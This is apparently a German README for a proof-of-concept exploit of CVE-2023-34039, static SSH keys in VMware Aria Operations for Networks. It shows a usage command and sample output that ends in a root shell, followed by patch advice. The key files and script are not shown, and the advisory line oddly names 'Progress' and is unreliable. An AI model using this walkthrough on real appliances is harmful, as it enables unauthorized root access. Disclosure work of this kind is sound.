
VMware-Exploit
POC für CVE-2023-34039 VMWare Aria Operations for Networks (vRealize Network Insight) Statischer SSH-Schlüssel RCE
Eine Root-Cause-Analyse der Schwachstelle findest du in meinem Blog:
https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/

VMWare Aria Operations for Networks (vRealize Network Insight) von Version 6.0 bis 6.10 hat die SSH-Schlüssel für die Benutzer support und ubuntu nicht neu generiert, sodass ein Angreifer mit SSH-Zugriff eine root-Shell auf diesem Produkt erlangen kann.
Dieses Problem wurde VMWare gemeldet von Harsh Jaiswal (@rootxharsh) und Rahul Maini (@iamnoooob) bei ProjectDiscovery Research
Ich habe lediglich den Exploit geschrieben, wenn man das so nennen kann, denn es ist im Grunde ein SSH-Befehls-Wrapper.
python CVE-2023-34039.py --target 192.168.1.16
(!) VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)
(*) Exploit by Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_collector
(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_platform
(*) Trying key: keys/vrni-6.10.0/id_rsa_vnera_keypair_6.10.0_platform
********************************** ATTENTION **********************************
NTP Service is not healthy.
IMPACT: It may affect the proper working of other services.
ACTION: Restore the service using 'ntp' CLI command.
********************************** ATTENTION **********************************
support@vrni-platform-release:~$ sudo -i
root@vrni-platform-release:~# id
uid=0(root) gid=0(root) groups=0(root)
root@vrni-platform-release:~# hostname
vrni-platform-release
root@vrni-platform-release:~#
Aktualisieren Sie auf die neueste Version oder ergreifen Sie Gegenmaßnahmen, indem Sie den Anweisungen im Progress Advisory folgen.
Diese Software wurde ausschließlich zu Zwecken der akademischen Forschung und zur Entwicklung effektiver Verteidigungstechniken erstellt und ist nicht dazu bestimmt, Systeme anzugreifen, es sei denn, dies wurde ausdrücklich genehmigt. Die Projektbetreuer übernehmen keine Verantwortung oder Haftung für Missbrauch der Software. Verwenden Sie sie verantwortungsbewusst.